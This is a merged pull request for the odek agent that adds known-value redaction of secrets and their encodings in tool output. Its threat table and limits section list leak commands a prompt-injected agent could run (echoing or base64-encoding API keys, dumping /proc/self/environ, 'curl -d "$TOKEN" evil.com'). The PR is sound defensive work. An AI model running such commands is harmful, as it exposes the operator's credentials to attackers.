fix(redact): close secret-leak gaps on the tool output surface by jkyberneees · Pull Request #4 · BackendStack21/odek

jkyberneees · 2026-06-03T07:16:30Z

Problem

Tool output is redacted before it enters the transcript/session (internal/loop/loop.go:926), but the matcher is pattern-based — it only catches secrets whose format it recognises. That leaves real leak paths a prompt-injected agent can use:

| Vector | Example | Before |
| --- | --- | --- |
| Bare echo of a non-standard-format secret | `echo $TELEGRAM_BOT_TOKEN` | leaked (no `name=` context, shape unknown) |
| Encoded secret | `echo $API_KEY \| base64` / `xxd` / `rev` | leaked (value no longer matches any regex) |
| `/proc` environ dump | `cat /proc/self/environ` | partial |

Scrubbing the process env is not an option — the agent needs its keys (above all the LLM API key) to function. So the fix belongs on the tool output surface.

Fix

A known-value redaction layer that complements the existing format patterns:

- odek registers its own secrets at startup: the resolved API key, the Telegram bot token, and env vars with a secret-bearing name segment (config.LoadConfig; FD-supplied key in the subagent path).
- Those exact values and their common encodings (base64 std/raw/url, hex, percent, reversed) are redacted wherever they appear, regardless of format, closing all three vectors for odek's own secrets.
- Added a Telegram bot-token format pattern for tokens we don't hold.

Safety of the heuristic:

- Env-name matching is on whole _/- segments, so GIT_AUTHOR_NAME (AUTHOR) / compass (PASS) are not treated as secrets.
- Values under 8 chars are ignored (no over-redaction of ordinary text).
- Matching is literal (strings.Replacer): no regex metachar / ReDoS risk from arbitrary secret contents.

Honest limits (documented, not fixed here)

Redaction is a disclosure safety net, not an exfil guarantee. Arbitrary transformations (gzip, openssl enc, char-substitution) bypass the matcher, and side-channel exfiltration (curl -d "$TOKEN" evil.com, reverse shells, DNS tunnelling) never reaches the tool output surface; both remain the job of the network-egress controls (network_egress: prompt + non_interactive: deny + the egress denylist). See docs/REDACTION_HARDENING.md for the full threat model and the follow-up roadmap (streaming-boundary redaction, entropy heuristic for third-party secrets, redaction telemetry).

Tests

go test ./internal/redact/ — new coverage in known_value_test.go for each closed vector, env-scan selectivity, and the short-value guard. Touched packages (redact, config, loop, cmd/odek) all pass; go vet clean.

🤖 Generated with Claude Code

Tool output is redacted before it enters the transcript, but the format-pattern matcher only catches secrets whose shape it recognises. Three gaps let secrets through:

- a bare echo of a non-standard-format secret (e.g. a Telegram bot token, which has no name= context for the generic rule)
- a trivially encoded secret (echo $KEY | base64 / xxd / rev)
- a /proc/self/environ dump (NUL-delimited, no NAME= for the rule)

Add a known-value redaction layer: odek registers its own secrets (the LLM API key, the Telegram bot token, sensitively-named env vars) at startup and redacts those exact values plus their common encodings (base64, hex, percent, reversed), regardless of format. This is the reliable layer for odek's own secrets; the format patterns stay for secrets we don't hold but recognise by shape. Also add a Telegram bot-token pattern.

Env scanning matches whole _/- segments so GIT_AUTHOR_NAME and the like are not mistaken for secrets; values under 8 chars are ignored to avoid over-redaction. Matching is literal (strings.Replacer): no ReDoS risk from arbitrary secret contents.

The agent process keeps its keys (it needs them to talk to the model); this only stops them leaking back out through tool output. Side-channel exfiltration and arbitrary transformations remain the job of the network-egress controls, as documented in docs/REDACTION_HARDENING.md.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

jkyberneees merged commit 681bcd9 into main Jun 3, 2026
6 checks passed

jkyberneees merged 1 commit into main from fix/redact-known-value-leaks
